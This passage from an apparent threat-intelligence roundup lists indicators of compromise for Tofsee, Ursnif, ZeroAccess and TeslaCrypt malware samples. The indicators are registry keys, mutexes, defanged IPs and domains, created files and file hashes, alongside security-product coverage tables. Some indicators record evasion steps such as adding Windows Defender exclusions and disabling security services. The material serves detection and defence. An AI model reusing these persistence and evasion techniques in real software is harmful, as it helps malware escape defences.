\nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-MHJh8tA_x9o/XhjbFSHPYiI/AAAAAAAADFU/6vgp_DT_TBw5sncscgE1kUlKvtjc_gI0ACLcBGAsYHQ/s1600/34b978969d994134de71dd45996dc5d10516e534e23a2abb8537a1c548ac1c93_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-YOqwN9OAMNc/XhjbJu1E0bI/AAAAAAAADFY/oGYUIcxuUSIoBIPFIKTTnZ_0Nz4zHEWAwCLcBGAsYHQ/s1600/34b978969d994134de71dd45996dc5d10516e534e23a2abb8537a1c548ac1c93_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Dropper.Tofsee-7492214-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES ` | 192 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config3 ` | 175 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Type ` | 158 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Start ` | 158 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ErrorControl ` | 158 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: DisplayName ` | 158 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: WOW64 ` | 158 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ObjectName ` | 158 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Description ` | 158 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> ` | 158 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ImagePath ` | 68 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\wpdjiqwl ` | 11 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WPDJIQWL \nValue Name: Type ` 
| 11
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WPDJIQWL` Value Name: `Start` | 11
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WPDJIQWL` Value Name: `ErrorControl` | 11
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WPDJIQWL` Value Name: `DisplayName` | 11
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WPDJIQWL` Value Name: `WOW64` | 11
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WPDJIQWL` Value Name: `ObjectName` | 11
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WPDJIQWL` Value Name: `Description` | 11
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS` Value Name: `C:\Windows\SysWOW64\lesyxfla` | 11
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\LESYXFLA` Value Name: `Type` | 11
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\LESYXFLA` Value Name: `Start` | 11
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\LESYXFLA` Value Name: `ErrorControl` | 11
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\LESYXFLA` Value Name: `DisplayName` | 11
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\LESYXFLA` Value Name: `WOW64` | 11

IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`69[.]55[.]5[.]250` | 192
`43[.]231[.]4[.]6/31` | 192
`85[.]114[.]134[.]88` | 192
`239[.]255[.]255[.]250` | 175
`46[.]4[.]52[.]109` | 175
`46[.]28[.]66[.]2` | 175
`78[.]31[.]67[.]23` | 175
`188[.]165[.]238[.]150` | 175
`93[.]179[.]69[.]109` | 175
`176[.]9[.]114[.]177` | 175
`192[.]0[.]47[.]59` | 174
`172[.]217[.]12[.]164` | 159
`74[.]125[.]192[.]26/31` | 140
`67[.]195[.]204[.]72/30` | 135
`168[.]95[.]5[.]116/31` | 134
`172[.]217[.]197[.]26/31` | 122
`172[.]217[.]10[.]67` | 116
`216[.]146[.]35[.]35` | 110
`212[.]227[.]15[.]40/31` | 104
`104[.]47[.]54[.]36` | 102
`208[.]76[.]51[.]51` | 101
`168[.]95[.]6[.]60/30` | 97
`98[.]136[.]96[.]92/31` | 95
`31[.]13[.]66[.]174` | 93
`98[.]136[.]96[.]74/31` | 91

*See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`250[.]5[.]55[.]69[.]in-addr[.]arpa` | 192
`microsoft-com[.]mail[.]protection[.]outlook[.]com` | 192
`schema[.]org` | 175
`250[.]5[.]55[.]69[.]zen[.]spamhaus[.]org` | 175
`250[.]5[.]55[.]69[.]cbl[.]abuseat[.]org` | 175
`mta5[.]am0[.]yahoodns[.]net` | 175
`250[.]5[.]55[.]69[.]dnsbl[.]sorbs[.]net` | 175
`250[.]5[.]55[.]69[.]bl[.]spamcop[.]net` | 175
`250[.]5[.]55[.]69[.]sbl-xbl[.]spamhaus[.]org` | 175
`whois[.]iana[.]org` | 174
`whois[.]arin[.]net` | 173
`coolsex-finders6[.]com` | 173
`bestladies[.]cn` | 173
`bestdates[.]cn` | 173
`bestgirlsdates[.]cn` | 173
`hotmail-com[.]olc[.]protection[.]outlook[.]com` | 171
`eur[.]olc[.]protection[.]outlook[.]com` | 127
`mx-eu[.]mail[.]am0[.]yahoodns[.]net` | 125
`ipinfo[.]io` | 118
`nam[.]olc[.]protection[.]outlook[.]com` | 93
`mx6[.]earthlink[.]net` | 91
`pkvw-mx[.]msg[.]pkvw[.]co[.]charter[.]net` | 88
`charter[.]net` | 87
`mx0[.]charter[.]net` | 87
`msn-com[.]olc[.]protection[.]outlook[.]com` | 72

*See JSON for more IOCs

Files and or directories created | Occurrences
---|---
`%SystemRoot%\SysWOW64\config\systemprofile` | 192
`%SystemRoot%\SysWOW64\config\systemprofile:.repos` | 192
`%TEMP%\<random, matching '[a-z]{8}'>.exe` | 188
`%SystemRoot%\SysWOW64\<random, matching '[a-z]{8}'>` | 158
`%HOMEPATH%` | 59
`%System32%\<random, matching '[a-z]{8}\[a-z]{6,8}'>.exe (copy)` | 59
`%SystemRoot%\SysWOW64\wpdjiqwl` | 11
`%SystemRoot%\SysWOW64\lesyxfla` | 11
`%SystemRoot%\SysWOW64\mftzygmb` | 10
`%SystemRoot%\SysWOW64\piwcbjpe` | 10
`%SystemRoot%\SysWOW64\zsgmltzo` | 10
`%SystemRoot%\SysWOW64\yrflksyn` | 10
`%TEMP%\<random, matching '[a-z]{4,9}'>.exe` | 9

#### File Hashes

```
03dfa2a7b5722d6fa2f2f85287c8bea67b2ae1c8be2d9de90b33c2b4dd3c0f42
07314be6c87366f215030d7a2af42440f8a2a187e782ad975a476a84aa389fe1
0862506904a93aba08781be3d9b5189c8cc01bc5fd86d9a4881bd114449502b7
088fe0b34e1db5b9010adb26a2380aa6faf53165f9e2d7d986fd0bc6be614f9e
0ad21f45614d3112c1201ff8a5b3fe702b4943e39ab9d8bc4f38362565c373d5
0b2c1eebcd3f136c556a8568541d589f691dbe6fb450fa708e9774f4ca72fb67
10d2a79f8c199a6ce16b0e3fd4a911524cc2ece755daf67c04f0d3118dfb3498
11e2d71f1dab632b58c9ab60a48c51854d59df47456a97ff9ef59c72b607229c
136e082449131aae0a3e28c21c99aaef24a9d1709cae71daee0e154bf2b45d9f
144d2f639c9dafd40f48b72980609cb018ca83a360b7e24fede6023e0e742397
16f778581e678fdd5e21442d3d55bcc4415271ac94ed0d31c2efd40c772f26ec
1733e36d0e55b369c97e387fa74da22462fbf1858b09befb5de125d9523e3d41
1756a1f4ce0593f80b857ed9a654c656dac96d3405a566dc38737e0a79bc194d
188389b2163b98dbb96edf4000496dacc062f2a6ae2dd021a3f49742d36a2e0b
189f32c3d78e9b129d62bb4e40b3693da216cc371018d5ce4ef2356a94ca4f6e
18f25a4e071f993b9ceac935a3814d7667e42c46d22ea9e8ccd7c4a3f0087f7b
1a747af4f485eb3c8c475c9dcd9cac9d7fe279f3f45777d793572c4927e07ffa
1af4c3359d224c2ad2006db3c9786afdeeb90404ab91ec7c63467092264e2183
1c1d1c939fd6d3e6a77c2fa342f2c39433eea8f9d3c749ecee42e287734bd330
1c69825459d03fb13956e1a0f40e485731fbe96e48efe1abc765db537fec77ba
1d3aecb8b67bd70634fbffcf15b5e21ef0ee95627d296e78caf3f07842820d9a
1d9d2d4000df6baadc93db56dbdc783c9db35a047be86bed8d4bfaacb33b6a9c
1f42ceba5e533e7aeb5395e1db11ef780b02e44c8cde237394b663b816da69b4
1ff0ce00b3cc5e3223e31501e16302b44ae24981b4b61f3500bdba2f671a057f
20f52e7aa1ee2e27dffcb75eb1e207681dbe2f72d44b0f4d2f66498102d8cf8e
```

*See JSON for more IOCs

#### Coverage

Product | Protection
---|---
AMP | 
Cloudlock | N/A
CWS | 
Email Security | 
Network Security | 
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | 
Umbrella | 
WSA | 

#### Screenshots of Detection

#### AMP

[AMP detection screenshot](https://1.bp.blogspot.com/-tmXF5v63Jfs/XhjbhTSqqYI/AAAAAAAADFk/eoXC5VAn8DU9wPiKtOPCvDq23e0ok1oYgCLcBGAsYHQ/s1600/1a747af4f485eb3c8c475c9dcd9cac9d7fe279f3f45777d793572c4927e07ffa_amp.png)

#### ThreatGrid

[ThreatGrid detection screenshot](https://1.bp.blogspot.com/-SRL2YycZuyI/XhjbmvOX-2I/AAAAAAAADFo/mxJn335IT1QK3kgnuIvNsWNXtiaeupf7gCLcBGAsYHQ/s1600/68e9ffea30a67de2447273c5a42a929c25fd64d9e92b61dc35832e7346abbbac_tg.png)

#### Umbrella

[Umbrella detection screenshot](https://1.bp.blogspot.com/-DbOXtwy7wUE/XhjbuUrH5WI/AAAAAAAADFs/EAxRh7Yx__Uj4ZKHmInI8xSA-PBEO-5lwCLcBGAsYHQ/s1600/1a747af4f485eb3c8c475c9dcd9cac9d7fe279f3f45777d793572c4927e07ffa_umbrella.png)

* * *

### Win.Packed.Ursnif-7489213-0

#### Indicators of Compromise

Registry Keys | Occurrences
---|---
`<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\CERTIFICATES\DAC9024F54D8F6DF94935FB1732638CA6AD77C13` Value Name: `Blob` | 18
`<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\CERTIFICATES\75E0ABB6138512271C04F85FDDDE38E4B7242EFE` Value Name: `Blob` | 18

Mutexes | Occurrences
---|---
`Local\https://vars.hotjar.com/` | 18
`Local\https://www.avast.com/` | 18

IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`23[.]221[.]50[.]122` | 18
`152[.]199[.]4[.]33` | 18
`23[.]221[.]49[.]75` | 18
`23[.]221[.]50[.]102` | 18
`104[.]107[.]26[.]214` | 18
`13[.]109[.]156[.]118` | 18
`65[.]55[.]44[.]109` | 17
`157[.]240[.]18[.]35` | 15
`104[.]107[.]18[.]91` | 15
`38[.]126[.]130[.]202` | 15
`192[.]42[.]119[.]41` | 14
`13[.]107[.]21[.]200` | 13
`172[.]217[.]164[.]136` | 13
`23[.]196[.]81[.]176` | 13
`204[.]79[.]197[.]200` | 12
`204[.]2[.]197[.]202` | 12
`72[.]22[.]185[.]200/31` | 12
`172[.]217[.]197[.]156/31` | 12
`172[.]217[.]6[.]206` | 11
`172[.]217[.]12[.]136` | 11
`172[.]217[.]11[.]36` | 11
`172[.]217[.]10[.]14` | 11
`169[.]54[.]251[.]164` | 11
`23[.]201[.]42[.]247` | 11
`23[.]201[.]42[.]161` | 11

*See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`googleads[.]g[.]doubleclick[.]net` | 18
`www[.]googletagmanager[.]com` | 18
`www[.]google-analytics[.]com` | 18
`stats[.]g[.]doubleclick[.]net` | 18
`connect[.]facebook[.]net` | 18
`www[.]googleadservices[.]com` | 18
`ib[.]adnxs[.]com` | 18
`avast[.]com` | 18
`static[.]avast[.]com` | 18
`secure[.]adnxs[.]com` | 18
`mc[.]yandex[.]ru` | 18
`dev[.]visualwebsiteoptimizer[.]com` | 18
`amplifypixel[.]outbrain[.]com` | 18
`pixel[.]mathtag[.]com` | 18
`tr[.]outbrain[.]com` | 18
`amplify[.]outbrain[.]com` | 18
`ajax[.]aspnetcdn[.]com` | 18
`img-prod-cms-rt-microsoft-com[.]akamaized[.]net` | 18
`az725175[.]vo[.]msecnd[.]net` | 18
`script[.]hotjar[.]com` | 18
`static[.]hotjar[.]com` | 18
`c[.]s-microsoft[.]com` | 18
`assets[.]onestore[.]ms` | 18
`a[.]tribalfusion[.]com` | 18
`www[.]avast[.]com` | 18

*See JSON for more IOCs

Files and or directories created | Occurrences
---|---
`%TEMP%\www2.tmp` | 13
`%TEMP%\www3.tmp` | 13
`%TEMP%\www4.tmp` | 13
`%HOMEPATH%\Favorites\Links\Suggested Sites.url` | 13
`%HOMEPATH%\Local Settings\Application Data\Microsoft\Feeds\FeedsStore.feedsdb-ms` | 13
`%HOMEPATH%\Local Settings\Application Data\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\WebSlices~\Suggested Sites~.feed-ms` | 13
`\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A4A1A128-768F-41E0-BF75-E4FDDD701CBA}` | 2
`\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B40C43F1-F039-44D2-AEB7-87F5AF8ABC3D}\ProxyStubClsid32` | 2
`\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{06EEE834-461C-42c2-8DCF-1502B527B1F9}\Instance\PropertySetStorage` | 2
`\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{D1FE6762-FC48-11D0-883A-3C8B00C10000}` | 2
`\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A3CCEDF7-2DE2-11D0-86F4-00A0C913F750}` | 1
`\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{00020420-0000-0000-C000-000000000046}` | 1
`\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A7EE7F34-3BD1-427f-9231-F941E9B7E1FE}` | 1
`\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{06EEE834-461C-42c2-8DCF-1502B527B1F9}\Instance\PropertySetStorage\{000214A0-0000-0000-C000-000000000046}\14` | 1
`\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{06EEE834-461C-42c2-8DCF-1502B527B1F9}\Instance\PropertySetStorage\{000214A0-0000-0000-C000-000000000046}\2` | 1
`\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6f237df9-9ddb-47ad-b218-400d54c286ad}` | 1
`\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A4A1A128-768F-41E0-BF75-E4FDDD701CBA}\InProcServer32` | 1
`\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{81397204-F51A-4571-8D7B-DC030521AABD}\InprocServer32` | 1

#### File Hashes

```
0ad051eb62410a3fe8d776a69f29a46fe609ea59c2adfe061811dc9ace3e40e9
17cfe796a3b8017bf83d2c302ec9507317abac0191cdf835d2d0d1a75d33b991
18b5f4e21612aadfed4e72cdef1356009fb1614535b62a4e39463f8cea9ace03
2013ff55ccdd16e36eccebe50b0587b6f2f37e333442be1552b50c41cbfe48d4
241ab82dccad5b9670c445509841c6aebf69de45815c3d9951f15be158b8ece5
270f970f0cfda8e8c61a73b2aab71fd51755ad911b8173f5aac4cdb5961ba8a5
3016c699d4c8c7affedc18f5cb4aadb30676a9c3081dee913b43b84737949708
31a02187883766f2eec0edc6479b8cd793c8e8eec658fe56b33581a76d9953f8
365acef54f3733520717314466c86aa978cbf08c37d1f9f0a90bbbea42b3f8f3
5ba3ea5868ddef74a57fff2c5ded68f17b08458876881161a7af9eb32438779d
5c486b96a5f273819baa9a010700f088ce3f707c87088a50e699ee6dedd0b117
611e95e1a1a352d6cb1a6106b0e69565b065de6d68dbe5c41d49c2ebfa637dd6
7a8b53746144a903954535791ef7c5038834af3cd1eec8c0dae8b28f609859bf
7fd6f59c5c23ea12adf5975e56730a52558799ae7a330ef40e552a4353a8d6e3
8220634b1969f5a06e3b5adff2dbae0356608a91e5162fccdd247f1571a2a4b2
9a20d2755608e7cf98a090f30b166779318f0a08747631fccc9393de15ed33cc
9b6503731468ce3922f5aec73e22a81489ddcf6124d86eeb2fc05cb7c2f4527f
b062f5f376af3972c8386343b27fb1e5947afb66c5c0741cced2d317f5261158
b2c7bc0dece9bed221c3fe88b9dce2313b036b9a3f5982b5bfa91961efb7bdaf
bb8d733fa6ca4ef01d8b44d098902e781359cdd36a4418538a504082b3b95fe6
cecc5dd05c51a6740730b775dc4af3d579b498880de7899b272d6225fb96cb44
e6bd801ae1e976ff76409d2b28d00d15f50e5819c3c5bbc54eb4ac9752f87435
```

#### Coverage

Product | Protection
---|---
AMP | 
Cloudlock | N/A
CWS | 
Email Security | 
Network Security | 
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | 
Umbrella | 
WSA | 

#### Screenshots of Detection

#### AMP

[AMP detection screenshot](https://1.bp.blogspot.com/-qqRWN9IMa3c/XhjcKHygokI/AAAAAAAADF8/X0iED0OEbeM0ZcIVlOarHSO4ziPfJuQdACLcBGAsYHQ/s1600/bb8d733fa6ca4ef01d8b44d098902e781359cdd36a4418538a504082b3b95fe6_amp.png)

* * *

### Win.Packed.ZeroAccess-7489468-1

#### Indicators of Compromise

Registry Keys | Occurrences
---|---
`<HKLM>\SOFTWARE\MICROSOFT\TRACING\KMDDSP` Value Name: `FileTracingMask` | 55
`<HKLM>\SOFTWARE\MICROSOFT\TRACING\KMDDSP` Value Name: `ConsoleTracingMask` | 55
`<HKLM>\SOFTWARE\MICROSOFT\TRACING\KMDDSP` Value Name: `MaxFileSize` | 55
`<HKLM>\SOFTWARE\MICROSOFT\TRACING\KMDDSP` Value Name: `FileDirectory` | 55
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC` Value Name: `Start` | 55
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IPHLPSVC` Value Name: `Start` | 55
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC` Value Name: `DeleteFlag` | 55
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC` Value Name: `DeleteFlag` | 55
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\BROWSER` Value Name: `Start` | 55
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN` Value Name: `Windows Defender` | 55
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND` Value Name: `Type` | 55
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND` Value Name: `ErrorControl` | 55
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IPHLPSVC` Value Name: `Type` | 55
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IPHLPSVC` Value Name: `ErrorControl` | 55
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IPHLPSVC` Value Name: `DeleteFlag` | 55
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC` Value Name: `Type` | 55
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC` Value Name: `ErrorControl` | 55
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC` Value Name: `Type` | 55
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC` Value Name: `ErrorControl` | 55
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9\CATALOG_ENTRIES\000000000010` Value Name: `PackedCatalogItem` | 55
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9\CATALOG_ENTRIES\000000000009` Value Name: `PackedCatalogItem` | 55
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9\CATALOG_ENTRIES\000000000008` Value Name: `PackedCatalogItem` | 55
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9\CATALOG_ENTRIES\000000000007` Value Name: `PackedCatalogItem` | 55
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9\CATALOG_ENTRIES\000000000006` Value Name: `PackedCatalogItem` | 55
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9\CATALOG_ENTRIES\000000000005` Value Name: `PackedCatalogItem` | 55

IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`94[.]242[.]250[.]64` | 116
`64[.]210[.]151[.]32` | 55
`178[.]32[.]190[.]142` | 55
`91[.]207[.]60[.]22` | 15
`71[.]229[.]165[.]75` | 15
`201[.]231[.]100[.]117` | 15
`71[.]239[.]117[.]142` | 9
`66[.]41[.]70[.]14` | 8
`71[.]63[.]0[.]235` | 7
`98[.]224[.]77[.]3` | 7
`83[.]15[.]111[.]38` | 7
`76[.]180[.]80[.]134` | 7
`24[.]73[.]24[.]191` | 7
`46[.]45[.]5[.]240` | 7
`67[.]185[.]179[.]4` | 6
`98[.]230[.]137[.]123` | 6
`69[.]80[.]173[.]91` | 6
`75[.]66[.]129[.]205` | 6
`69[.]117[.]29[.]163` | 6
`190[.]36[.]183[.]136` | 6
`77[.]126[.]70[.]166` | 6
`98[.]203[.]164[.]253` | 6
`67[.]240[.]46[.]208` | 5
`72[.]200[.]101[.]79` | 5
`68[.]97[.]172[.]87` | 5

*See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`promos[.]fling[.]com` | 55

Files and or directories created | Occurrences
---|---
`\@` | 116
`\L\eexoxfxs` | 116
`\cfg.ini` | 116
`\systemroot\assembly\GAC_32\Desktop.ini` | 55
`\systemroot\assembly\GAC_64\Desktop.ini` | 55
`%System32%\LogFiles\Scm\e22a8667-f75b-4ba9-ba46-067ed4429de8` | 55
`%SystemRoot%\assembly\GAC_32\Desktop.ini` | 55
`%SystemRoot%\assembly\GAC_64\Desktop.ini` | 55
`\systemroot\assembly\temp\@` | 55
`\systemroot\assembly\temp\U` | 55
`\systemroot\assembly\temp\cfg.ini` | 55
`\systemroot\system32\consrv.dll` | 55
`%System32%\consrv.dll` | 55
`%SystemRoot%\assembly\temp\@` | 55
`%SystemRoot%\assembly\temp\cfg.ini` | 55
`\systemroot\system64` | 55

#### File Hashes

```
024be6e3a83461f6084ade9ef26da705de0e7eeceebbd55ca5289a7396dcf280
02a6714aebbfef68f0528f10414a2fd8a8338243e05992d0c28d68383e1dc1a1
05597af5ff2dd97b20b7c57e4c3cd48cae1a4d2c7cd1c4ac920a6f1185a65900
0712314c985a7cc479d0cbcdcf06c886ba2d7fc79d89cf4efc56a137235eb379
0808ec44505b3130a5dde6e81c75f473f44a288d1134fff680394534283fce87
08b18f2eb8b1fb422adfb52d482f9d9bb3f4a24d18f89a186ed2865181f6b551
0b675bae551f40fe43934915324927652e35fa3089dcc911345478fc96338a3c
0d6aea5357e88970db6f5c226a2a888e1c7f1c5f20146087952612c06d064b4e
15d09a26dec6c151966a24bfebd38fb67c8397a06c3bf1702eb4702a871a9e2c
1744dd32bcf9cd45cfec1f4334de1df340129a555e12f73c740e02f7fe7b469c
1ac467786827d37bc69e30617fa2b14fa8903f68f73022e727caa634379490b2
1c9dc1eb7cb0191101faa393854592a440d6df736f07a767138df22c1f809c8d
1d34f5231571a20d3229e850bb786f6148dab477ca4a0169a0af3acf2d2ce71d
243ccb0ec0007367fc4e21dea982be68d6f32e6cdcafbd11e10768cb912a914b
2460096ab6403840c5de8a19dc1706cf2dc416cc9e3ab701275853d66eb7e142
24ec81e3c8a7247c0fa2292906afccc1d47b81412cfaf021dc22be067530e944
2b275de3b1d0f2786c58f17a0d2607a47dade5151046f255eea2f9da20a03c9c
311c8b6b2d2150fff040363e23fdca221be64cae3ad34d9b3dfacd396ed48fc6
330719fd8491c5abc9fd90c7e27310cb72d331222c5caaf4671525d48e4b1026
35ba7b85dd5146c275b74b7b09ef62985ba9db0d1e1f2771b6990d53ed965d52
37240db16c496c45552715904b84ce5cc2c1e01ebbcf519a7e0bee4cc73f08bd
39bf409ea1d861dfed811fa6c0aee2767aff44d96fffb4f3e552db1add1ed7fc
3b3d6c01a983c835152e169e092be6193bce78c22b41cda5e573e5330235aac6
3e6c74185843c930a9b5ea041a5a3eef7d9ae80a31e3a67e0c235b5090e64afb
3fcf02116eab251a35b6a9dba981edb13ba59701f0b52ca1521fd2dbff350477
```

*See JSON for more IOCs

#### Coverage

Product | Protection
---|---
AMP | 
Cloudlock | N/A
CWS | 
Email Security | 
Network Security | N/A
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | 
Umbrella | N/A
WSA | N/A

#### Screenshots of Detection

#### AMP

[AMP detection screenshot](https://1.bp.blogspot.com/-Y-3VEjv6iFk/XhjcZ1WO-yI/AAAAAAAADGA/eNkc2XpubMcY21A1yxwCj7qy42STBflugCLcBGAsYHQ/s1600/4226d5fb55c0175d485ccf6d2c935b5712a03f5bde8f3602432187f438d33352_amp.png)

* * *

### Win.Ransomware.TeslaCrypt-7501245-1

#### Indicators of Compromise

Registry Keys | Occurrences
---|---
`<HKCU>\SOFTWARE\XXXSYS` | 15
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN` Value Name: `addon_v57` | 15
`<HKCU>\SOFTWARE\XXXSYS` Value Name: `ID` | 15
`<HKCU>\Software\<random, matching '[A-Z0-9]{14,16}'>` | 15
`<HKCU>\Software\<random, matching '[A-Z0-9]{14,16}'>` Value Name: `data` | 15

Mutexes | Occurrences
---|---
`z_a_skh495ldfsgjl2935345` | 15

IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`23[.]20[.]239[.]12` | 15
`64[.]140[.]157[.]157` | 15
`157[.]119[.]94[.]202` | 15
`104[.]27[.]31[.]89` | 9
`104[.]27[.]30[.]89` | 6
`3[.]225[.]189[.]10` | 5
`3[.]229[.]167[.]115` | 4
`54[.]83[.]91[.]42` | 3
`34[.]195[.]145[.]145` | 2
`3[.]93[.]124[.]54` | 1

Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`en[.]wikipedia[.]org` | 15
`www[.]torproject[.]org` | 15
`www[.]hugedomains[.]com` | 15
`vostorgspa[.]kz` | 15
`p4fhmjnsdfbm4w4fdsc[.]avowvoice[.]com` | 15
`bledisloeenergy[.]com[.]au` | 15
`polyhedrusgroup[.]com` | 15
`todayinbermuda[.]co` | 15
`nn54djhfnrnm4dnjnerfsd[.]replylaten[.]at` | 15
`www[.]buildenergyefficienthomes[.]com` | 15
`mosaudit[.]com` | 15
`buildenergyefficienthomes[.]com` | 15
`akdfrefdkm45tf33fsdfsdf[.]yamenswash[.]com` | 15

Files and or directories created | Occurrences
---|---
`\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$I0ZU5JT.txt` | 15
`\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$I478AKJ.txt` | 15
`\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$I4FI238.txt` | 15
`\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$I4FKVBH.txt` | 15
`\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$I4QK3KJ.txt` | 15
`\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$I5QX7W9.txt` | 15
`\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$I77RW1L.txt` | 15
`\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$I7J37KF.txt` | 15
`\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$I9NSD58.txt` | 15
`\$Rec​ycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IANXEE8.txt` | 15
`\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IC5NB1M.txt` | 15
`\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$ID60W3E.txt` | 15
`\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IIUTK07.txt` | 15
`\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IJE160U.txt` | 15
`\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IKAVPAE.txt` | 15
`\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IL2NS3P.txt` | 15
`\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$INKC8CM.txt` | 15
